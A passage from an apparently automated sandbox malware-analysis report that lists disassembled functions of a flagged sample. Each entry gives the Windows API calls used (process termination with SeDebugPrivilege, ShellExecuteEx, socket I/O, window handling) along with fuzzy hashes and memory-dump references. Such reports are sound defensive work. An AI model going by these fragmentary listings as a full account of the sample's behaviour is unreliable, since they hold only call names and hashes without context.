                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: d797c4c8fd27bcffb0d9f5135285ba4885b1c7a83cbce60f204fded8424b1f78
                    • Instruction ID: 4d3a1f9d4833f3ad1ef1e2d454577f8feee2a6b9ad17df03bc9c6e8f4eed3535
                    • Opcode Fuzzy Hash: d797c4c8fd27bcffb0d9f5135285ba4885b1c7a83cbce60f204fded8424b1f78
                    • Instruction Fuzzy Hash: AB01BBB5241308FFE710ABA5DC4DF6B3BACEB89711F008421FA05DB1A1CA759C00CB24
                    Function 007C9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?,?,007A799D), ref: 007A766F
                      • Part of subcall function 007A7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A768A
                      • Part of subcall function 007A7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?,?), ref: 007A7698
                      • Part of subcall function 007A7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A758C,80070057,?), ref: 007A76A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007C9B1B
                    • _memset.LIBCMT ref: 007C9B28
                    • _memset.LIBCMT ref: 007C9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007C9C97
                    • CoTaskMemFree.OLE32(?), ref: 007C9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 007C9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: 80f089aefe57206a73733aa592d43f73b1051588fcf0195d2f77e2dbf911f7e4
                    • Instruction ID: 11cf7c340a08cadf78de06e255d629d7909b8e2f2b03c11f0cc924e052387613
                    • Opcode Fuzzy Hash: 80f089aefe57206a73733aa592d43f73b1051588fcf0195d2f77e2dbf911f7e4
                    • Instruction Fuzzy Hash: 27911871D00219EBDB10DFA5DC89EDEBBB9BF08710F20815AF519A7281DB759A44CFA0
                    Function 007D6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D70C1
                    • _wcscat.LIBCMT ref: 007D711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D7161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 5fa5cc19705083172405ae135bdb3a584c4563caa515ede8ecd05e0ae8b71f23
                    • Instruction ID: e1a1b8febd07dfd430ddc021cc273436b2fb8604b5e4a26a1576fa6abc93b40f
                    • Opcode Fuzzy Hash: 5fa5cc19705083172405ae135bdb3a584c4563caa515ede8ecd05e0ae8b71f23
                    • Instruction Fuzzy Hash: 3C417071904308EBDB259F64CC85BEA77B8EF08350F10452BF555E62D2E67A9D84CB60
                    Function 007CEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007B3EB6
                      • Part of subcall function 007B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007B3EC4
                      • Part of subcall function 007B3E91: CloseHandle.KERNEL32(00000000), ref: 007B3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECB8
                    • GetLastError.KERNEL32 ref: 007CECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007CECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 007CED77
                    • GetLastError.KERNEL32(00000000), ref: 007CED82
                    • CloseHandle.KERNEL32(00000000), ref: 007CEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: cbe4c839b404e7b7dfa207aeae4fabd15ea4c3759b37895b27eae22499e5cdbe
                    • Instruction ID: 530e7338f64ff1dce40fe98f2507a27f0ebbe1195ba453226dbb0f74713289fd
                    • Opcode Fuzzy Hash: cbe4c839b404e7b7dfa207aeae4fabd15ea4c3759b37895b27eae22499e5cdbe
                    • Instruction Fuzzy Hash: 15416B71200201DFDB14EF24CC99FAEB7A5AF81714F18845DF9439B2D2DBB9A904CB96
                    Function 007B3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 007B32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: 3fe1dabb6102611391c2def979ba7ac87d08ea33654836b94cd05e46c663e674
                    • Instruction ID: 97383c87802c9d8635d571b14ffac5ff1852f8ce4c6f62ee58f7b9e5f883f898
                    • Opcode Fuzzy Hash: 3fe1dabb6102611391c2def979ba7ac87d08ea33654836b94cd05e46c663e674
                    • Instruction Fuzzy Hash: C411273224875AFAEB055A54DC42EEAB39CFF19370F20402AF515A62C1E66D5B8046A5
                    Function 007B4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007B454E
                    • LoadStringW.USER32(00000000), ref: 007B4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B456B
                    • LoadStringW.USER32(00000000), ref: 007B4572
                    • _wprintf.LIBCMT ref: 007B4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 007B4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: f2e0c9df9a382e0cf94c757df3b920112c8e99cc3101d8c5d426861cf11010f2
                    • Instruction ID: 696a693e8b8a3941e77bfd9f22fcde94ec325a2c1702b42ef24d35634cf89475
                    • Opcode Fuzzy Hash: f2e0c9df9a382e0cf94c757df3b920112c8e99cc3101d8c5d426861cf11010f2
                    • Instruction Fuzzy Hash: 7B0144F2900208BFE7509794DD89EE6777CDB08301F0045A6F74AE2151E6799E854B75
                    Function 007DD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • GetSystemMetrics.USER32(0000000F), ref: 007DD78A
                    • GetSystemMetrics.USER32(0000000F), ref: 007DD7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007DD9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007DDA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007DDA24
                    • ShowWindow.USER32(00000003,00000000), ref: 007DDA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007DDA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 007DDA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: 0d37a0af8256cd3776a72d75fd7834e6ec4e72f8f589a871ceb0bcac1c31e512
                    • Instruction ID: 91529b864aa2ab4a8094e35a37170a95885a591aaccef750384a02aa93268d35
                    • Opcode Fuzzy Hash: 0d37a0af8256cd3776a72d75fd7834e6ec4e72f8f589a871ceb0bcac1c31e512
                    • Instruction Fuzzy Hash: A9B18871600225EFDF24CF68C9997AD7BB1FF48711F08C06AEC899A295D739AD50CB60
                    Function 00752A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 00752ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000,000000FF), ref: 00752B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0078C417,00000004,00000000,00000000,00000000), ref: 0078C4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: d7449acbf011498127f5baf3834ae5ac315681fa3a453dfe9099aa9a639a54cf
                    • Instruction ID: fed06514637dea9d95de0bddbe3212610bfe20293362967a82cccf77f91ed014
                    • Opcode Fuzzy Hash: d7449acbf011498127f5baf3834ae5ac315681fa3a453dfe9099aa9a639a54cf
                    • Instruction Fuzzy Hash: CF41EE312046C0AAC7369B288C9C7F67BA5AF47312F54C41EED4786562D6FD988FD720
                    Function 007B7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007B737F
                      • Part of subcall function 00770FF6: std::exception::exception.LIBCMT ref: 0077102C
                      • Part of subcall function 00770FF6: __CxxThrowException@8.LIBCMT ref: 00771041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007B73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 007B73D2
                    • _memmove.LIBCMT ref: 007B7420
                    • _memmove.LIBCMT ref: 007B743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 007B744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007B7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007B7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: ad1a3978f12f14684da75ebae0060011fb2f54cec2b36b14968967e894ca71fc
                    • Instruction ID: 547e32df96fd83a2cc71325893630d6dbbb6a5bb2fd08a8a80b8d2e1fa1f0744
                    • Opcode Fuzzy Hash: ad1a3978f12f14684da75ebae0060011fb2f54cec2b36b14968967e894ca71fc
                    • Instruction Fuzzy Hash: A5318131A04205EFCF10DF64DC89AAE7BB8FF44750B1481B5F904AB246DB38AA10CBA4
                    Function 007D6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 007D645A
                    • GetDC.USER32(00000000), ref: 007D6462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007D646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 007D6479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007D64B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007D64C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007D9299,?,?,000000FF,00000000,?,000000FF,?), ref: 007D6500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007D6520
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 92d28c543611774fbcb759cbd4579a0ddf5ee1317a4fa310d09a4eae21c26190
                    • Instruction ID: d388af3af94e1df42a36c7f5796f4a7620b805edb7aff684d06e87e1e425ed65
                    • Opcode Fuzzy Hash: 92d28c543611774fbcb759cbd4579a0ddf5ee1317a4fa310d09a4eae21c26190
                    • Instruction Fuzzy Hash: D3316F72101214BFEB118F50DC49FEA3FB9EF09761F048066FE099A291D6799951CB64
                    Function 007AC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 86707ce4d080c0f3bc62350a7ab461d464fb6824ed770019e068269007fcc534
                    • Instruction ID: f442e2df0aa68c1bb0f992da120189469706a3d4b87b226f3d259533f45d0a30
                    • Opcode Fuzzy Hash: 86707ce4d080c0f3bc62350a7ab461d464fb6824ed770019e068269007fcc534
                    • Instruction Fuzzy Hash: 1921F8B1701309F7D612A9258C46FBB235D9F963D4B444120FE09D6293EB1DED11C2A1
                    Function 007BED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                    • _wcstok.LIBCMT ref: 007BEEFF
                    • _wcscpy.LIBCMT ref: 007BEF8E
                    • _memset.LIBCMT ref: 007BEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: 954cd040a7af500bd950e6b2fed695b1bf1301d1cee262bc5b6b9edc614c0299
                    • Instruction ID: 04f8f87d00c0e08b722bef7eeaf02cdbcd8e04ba1eefe7f22423605d5788fd6e
                    • Opcode Fuzzy Hash: 954cd040a7af500bd950e6b2fed695b1bf1301d1cee262bc5b6b9edc614c0299
                    • Instruction Fuzzy Hash: 21C17071508300DFC754EF24D889A9AB7E4FF84710F04892DF999972A2DB78ED49CB92
                    Function 007C6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                    Download Yara Rule
                    APIs
                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007C6F14
                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007C6F35
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6F48
                    • htons.WSOCK32(?,?,?,00000000,?), ref: 007C6FFE
                    • inet_ntoa.WSOCK32(?), ref: 007C6FBB
                      • Part of subcall function 007AAE14: _strlen.LIBCMT ref: 007AAE1E
                      • Part of subcall function 007AAE14: _memmove.LIBCMT ref: 007AAE40
                    • _strlen.LIBCMT ref: 007C7058
                    • _memmove.LIBCMT ref: 007C70C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    • Opcode ID: 550a1105de3622ec70be39a118fa775548472c1de569c744c2d608c7dcf6d0a6
                    • Instruction ID: 9318e05e3900a49a957410bcd8eb253fb251104d1c14da9a0971bf2ddd8cb4d2
                    • Opcode Fuzzy Hash: 550a1105de3622ec70be39a118fa775548472c1de569c744c2d608c7dcf6d0a6
                    • Instruction Fuzzy Hash: A581F371504300EBD714EF24CC8AFABB3E9AF84714F14851DF9569B292DBB8AD44CB92
                    Function 00751424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc4b4ce903d1bf9de870519332695976d561d90ad8908a551b4662ab4b683cad
                    • Instruction ID: 08fea1eaa82a15c14b3cd77a00d6552a5e21246a667dbfb26e67460526783b29
                    • Opcode Fuzzy Hash: dc4b4ce903d1bf9de870519332695976d561d90ad8908a551b4662ab4b683cad
                    • Instruction Fuzzy Hash: FB717930900109EFCB04DF98CC89AFEBB79FF85312F648159F915AA251C778AA15CBA4
                    Function 007DB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(011E53C0), ref: 007DB6A5
                    • IsWindowEnabled.USER32(011E53C0), ref: 007DB6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007DB795
                    • SendMessageW.USER32(011E53C0,000000B0,?,?), ref: 007DB7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 007DB809
                    • GetWindowLongW.USER32(011E53C0,000000EC), ref: 007DB82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007DB843
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 93ac5ede1f88da1239b66cc48851c85bb79af636e48db82554fcd5bfe63860a7
                    • Instruction ID: e3dce9c4ed1d254544f0a7d8d56a155d4f811b02405ac5bbeea7368737c5a25b
                    • Opcode Fuzzy Hash: 93ac5ede1f88da1239b66cc48851c85bb79af636e48db82554fcd5bfe63860a7
                    • Instruction Fuzzy Hash: 1F718B34601204EFDB219F64C894FBA7BB9FF49310F1A446BE986973A1C739E851CB54
                    Function 007CF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007CF75C
                    • _memset.LIBCMT ref: 007CF825
                    • ShellExecuteExW.SHELL32(?), ref: 007CF86A
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                      • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 007CF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 007CF910
                    Strings
                    Memory Dump Source
